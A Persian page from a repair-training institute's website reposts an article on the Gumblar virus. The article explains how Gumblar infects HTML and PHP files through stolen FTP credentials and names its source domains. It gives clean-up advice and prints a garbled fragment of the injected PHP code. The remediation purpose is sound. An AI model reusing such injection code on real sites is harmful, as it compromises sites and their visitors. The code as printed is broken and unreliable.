همایش نمایندگی های انستیتو ایزایران
مشهد مقدس آذر 1394
تقدیر ریاست محترم فنی و حرفه ای تهران
مرکز 8 فنی و حرفه ای اقدسیه
کارگاه های مجهز و اساتید با تجربه
انستیتو انفورماتیک فنی کار

ایزایران لپ تاپ

با اعطای مدرک بین المللی انستیتو ایزایران | با اعطای مدرک انستیتو انفورماتیک فنی کار

مرکز آموزش تخصصی و فوق تخصصی نصب و تعمیرات ماشین های اداری و سخت افزار کامپیوتر

ثبت نام  آنلاین    شهریه دوره ها 

این ویروس مخوف به دو صورت عمل می کنه
روش اول:
1.الوده سازی فایل های index.htm/html
2.ساخت فایل image.php در فولدر های images
---------
روش دوم
1.آلوده سازی همون فایل های html و بدتر از اون آلوده سازی فایل های php که بیشتر index ها رو نشونه می گیره
2.ساخت یک فایل با اسم gifimg.php
----------
روش مقابله خیلی ساده ولی با احتیاط عمل کنید:
اگه مدیر سرور هستید که بسادگی می تونید همونطوری که دوستان گفتند عمل کنید و فایل هایی که منم گفتم پاک نکنید فقط خالی از کد کنید و سطح دسترسی اونا رو 444 بذارید
و حالا اگه مثل من باشید:
کل فایل های رو با tar.gz فشر ده کنید که حجمش خیلی کم می شه بعد دانلود و با دریم ور یکی فایل رو باز کنید و از طریق جستجو ی که می تونه کل فایل های یک فولدر رو بگرده استفاده کنید
برای فایل های php و html یک کد جاوای ناخوانا اضافه می کنه که راحت می شه فهمید و برای php هم درست اول کدها اضافه می شه
و به با replace all همه کدهای اضافی رو پاک کنید
این ویروس تا این لحظه می نویسم توسط هیچ انتی ویروسی شناسایی نمی شه (اگه می شناسه به منم بگید)
و نکته مهم اینکه این ویروس خیلی پیشرته هست اگه مثل من به صورت ناقص عمل کنید نوع پیشرفته روی هاست کپی می کنه همون روش دوم
----------
به هیچ عنوان سایت هایی که آلوده هستند رو باز نکنید نشونه اون هم لود یک فایل به ظاهر pdf هست که گول زننده هست و مل من نباشید که اجرا کنید
این ویروس در حال حاظر از دو سایت Gumblar.cn و martuz.cn قدرت می گیره
نگته مهم:
پسوردهای ftp رو عوض کنید و به هیچ عنوان با file zilla وصل نشید و از core ftp استفاده کنید . و هرگز پسوردها رو ذخیره نکنید.
چند خطی درباره ویروس گامبلار
گامبلار نام ویروسی است که در این چند وقت اخیر بلای جان سایت ها شده است و موتور جستجو گر گوگل را به زحمت انداخته تا زیر آدرس سایت هایی که گامبلار به آنها نفوذ کرده است این جمله را درج نماید ” این وبگاه ممکن است به رایانه شما آسیب برساند. “
اما چگونه گامبلار نفوذ میکیند ؟
وقتی ویروس گامبلار به رایانه شما نفوذ میکیند، شما هر زمانی ftp مربوط به سایتی رو بازکنید، فایل هایی که بر روی ftp وجود دارند بلافاصله ویروسی می شوند. وقتی گوگل برای اندکس صفحات، به سایت شما سر میزند، کاری ندارد که شما بدون آنکه خودتان بخواهید ویروسی شده اید. بنابراین تنها کاری که میکند جمله ” این وبگاه ممکن است به رایانه شما آسیب برساند ” را در زیر آدرس سایت شما درج میکند. تمام رتبه هایی که سایت شما از موتور جستجوگر گوگل گرفته بود، حذف خواهد شد بدین صورتی که اگر در موتور جستجوگر گوگل، شما در صفحات ابتدایی بودید، حال دیگر در صفحات هزارم هم خبری از سایت شما نیست
این ویروس صفحات وب شما را آلوده کرده و کدی شبیه به کد زیر فایل های (.html, .php, .js, etc.) را در برمیگیرد.
بیشتر سایت هایی که به این ویروس آلوده شدن گزارش دادند که کدی شبیه به کد زیر در خط ابتدایی فایل های PHP قرار میگیرند.
<?php if(!function_exists(’tmp_lkojfghx’))#’,$v) || preg_match(’#[([](s*d+,)20,#’,$v);
if((preg_match(’# eval #’,$v)&&($e||strpos($v,’fromCharCode’)))||($e&&strpos;($v,’[removed]‘)))$s=str_replace($v,”,$s);
$s1=preg_replace(’#<script language=javascript><!– document.write(unescape(.+? –></script>#’,”,$s);
if(stristr($s,’<body’)) $s=preg_replace(’#(s*<body)#mi’,TMP_XHGFJOKL.’۱′,$s1);elseif(($s1!=$s)||stristr($s,’</body’)||stristr($s,’</title>’))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0)ob_start(’tmp_lkojfghx’);for($i=0;$i<count($s);$i++)
if(($a=@set_error_handler(’tmp_lkojfghx2′))!=’tmp_lkojfghx2′)
$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2();
?>
اما در پست وبلاگ AbelCheng.com گزارش داده که منتشر کننده این ویروس با بدست آوردن نام کاربری و رمز عبور ftp اقدام به هک وبلاگ مربوطه کرده است. ( نویسنده این وبلاگ گفته است وقتی علت هک وبلاگ خود را بررسی کردن نمونه کد بالا در ابتدا ( خط اول ) فایل PHP وجود داشته است.
چگونه از شر گامبلار خلاص شویم ؟
شما باید در اولین مرحله از رایانه خودتان شروع کنید ( من پیشنهاد میکنم که مطمئن ترین راه رو انتخاب کنید یعنی یک بار سیستم عاملی که بر روی رایانتون نصب هست را پاک کنید و دوباره آن را نصب کنید البته اگر این تعویض سیستم عامل با فرمت کردن درایو های رایانه ی شما همراه باشه خیلی مطمئن تر و دقیق تر خواهد بود )
اما افراد زیادی بدون تعویض سیستم عامل و با استفاده ازMalwarebytes توانستن، این کار را با موفقیت انجام بدهند
( گزارش ها این رو اثبات میکنه )
در مرحله دوم بعد از این که رایانه ی خودتون رو با استفاده از ۲ روش فوق پاکسازی کردید باید پسورد ( رمز عبور ) ftp را عوض کنید.
و سرانجام شما باید فایل های PHP را پاکسازی کنید ( به شما پیشنهاد می کنم، اگر فایل های خام و پاک برنامه ی مدیریت محتوایی که روی سایتتون نصبه و یا فایل های خام و پاک (.html, .php, .js, etc.) اگر در رایانه خودتون دارید به جای پاکسازی فایل ها، انها را در هاست جایگزین نمایید. ) البته مراقب باشید که این فایلها قبلا در رایانه شما ویورسی نشده باشد.
من اسکریپ بالا را در فایل index.php قالب دو تا از سایت ها پیدا کردم. اما نباید فقط محدود به پیدا کردن تنها این کد باشیم ( پیشنهاد می کنم برای اطمینان بیش تر تمام فایل های (.html, .php, .js, etc.) رو جایگزین و پاکسازی کنید.
در اخر باید منتظر گوگل باشید تا دوباره به سایت شما سر بزنه و جمله ” این وبگاه ممکن است به رایانه شما آسیب برساند ” را حذف نماید.

فرم ثبت نام

پس از تکمیل فرم پیش ثبت نام منتظر تماس مشاور آموزشی خودتان باشید . در صورت تمایل با شماره ویژه : 02188930441 تماس بگیرید

اطلاعات فردی

شماره تلفن شما راه ارتباطی ما با شماست در زمان ثبت نام دقت کنید به اشتباه عددی را وارد ننمایید .

انتخاب دوره آموزشی

captcha

دوره های آموزشی

ecu fannikar.com

copier fannikar.com

fax fannikar.com

fannikar camera

انستیتو انفورماتیک فنی کار نماینده رسمی و معتبر انستیتو ایزایران مرکز آموزش تعمیرات تخصصی و آموزش تعمیرات ماشینهای اداری و آموزش تعمیرات فکس و آموزش تعمیرات تبلت و آموزش تعمیرات پرینتر و آموزش تعمیرات مادربرد و آموزش تعمیرات لپ تاپ و آموزش تعمیرات موبایل و آموزش تعمیرات چاپگر و آموزش تعمیرات کپی و آموزش شارژ کارتریج و آموزش تعمیرات ecu و آموزش تعمیر پرینتر لیزری و آموزش تعمیرات بردهای پزشکی و آموزش تعمیرات نوت بوک و آموزش تعمیرات چاپگر لیزری و آموزش تعمیر ماشین های اداری و اموزش تعمیر dvr و آموزش تعمیرات در تهران و آموزشگاه تعمیرات فنی و آموزش تعمیرات و نصب و آموزش تعمیرات چاپگر های جدید و آموزش تعمیر موبایل و آموزش تعمیرات موبایل و آموزش تعمیر تلویزیون و آموزش تعمیرات تلویزیون و آموزش تعمیر کامپیوتر و آموزش تعمیرات کامپیوتر و آموزش تعمیر ای سی یو و آموزش تعمیرات ای سی یو و آموزش تعمیر لپ تاپ و آموزش تعمیرات لپ تاپ و آموزش تعمیر لپتاپ و آموزش تعمیرات لپتاپ و آموزش تعمیر ال ای دی و آموزش تعمیرات ال ای دی و آموزش تعمیر ال سی دی و آموزش تعمیرات ال سی دی و آموزش نصب دوربین مدار بسته و آموزش نصب دوربین مداربسته و آموزش نصب کولر گازی و آموزش نصب کولرگازی و آموزش تعمیر کولر گازی و آموزش تعمیرات کولر گازی و آموزش شارژ کارتریج و آموزش شارژ کارتریج و آموزش مهندسی معکوس و اموزش مهندسی معکوس و آموزش تعمیر برد الکترونیکی و آموزش تعمیرات برد الکترونیکی و آموزش نصب دزدگیر خودرو و آموزش نصب دزدگیر ماشین و  آموزش تعمیر ماشین های اداری و آموزش تعمیرات ماشین های اداری و آموزش تعمیر ماشینهای اداری و آموزش تعمیرات ماشینهای اداری و آموزشگاه تعمیر موبایل و آموزشگاه تعمیرات موبایل و اموزش تعمیر موبایل و اموزش تعمیرات موبایل و اموزش تعمیر تلویزیون و اموزش تعمیرات تلویزیون و اموزش تعمیر کامپیوتر و اموزش تعمیرات کامپیوتر و اموزش تعمیر ای سی یو و اموزش تعمیرات ای سی یو و اموزش تعمیر لپ تاپ و اموزش تعمیرات لپ تاپ و اموزش تعمیر لپتاپ و اموزش تعمیرات لپتاپ و اموزش تعمیر ال ای دی و اموزش تعمیرات ال ای دی و اموزش تعمیر ال سی دی و اموزش تعمیرات ال سی دی و اموزش نصب دوربین مدار بسته و اموزش نصب دوربین مداربسته و اموزش نصب کولر گازی و اموزش نصب کولرگازی و اموزش تعمیر کولر گازی و اموزش تعمیرات کولر گازی و اموزش شارژ کارتریج و اموزش شارژ کارتریج و اموزش مهندسی معکوس و اموزش تعمیرات برد به روش مهندسی معکوس و اموزش تعمیر برد الکترونیکی و اموزش تعمیرات برد الکترونیکی و اموزش نصب دزدگیر خودرو و اموزش نصب دزدگیر ماشین و اموزش تعمیر ماشین های اداری و آموزش تعمیرات ماشین های اداری و اموزش تعمیر ماشینهای اداری و اموزش تعمیرات ماشینهای اداری و اموزشگاه تعمیر موبایل و اموزشگاه تعمیرات موبایل در فنیکار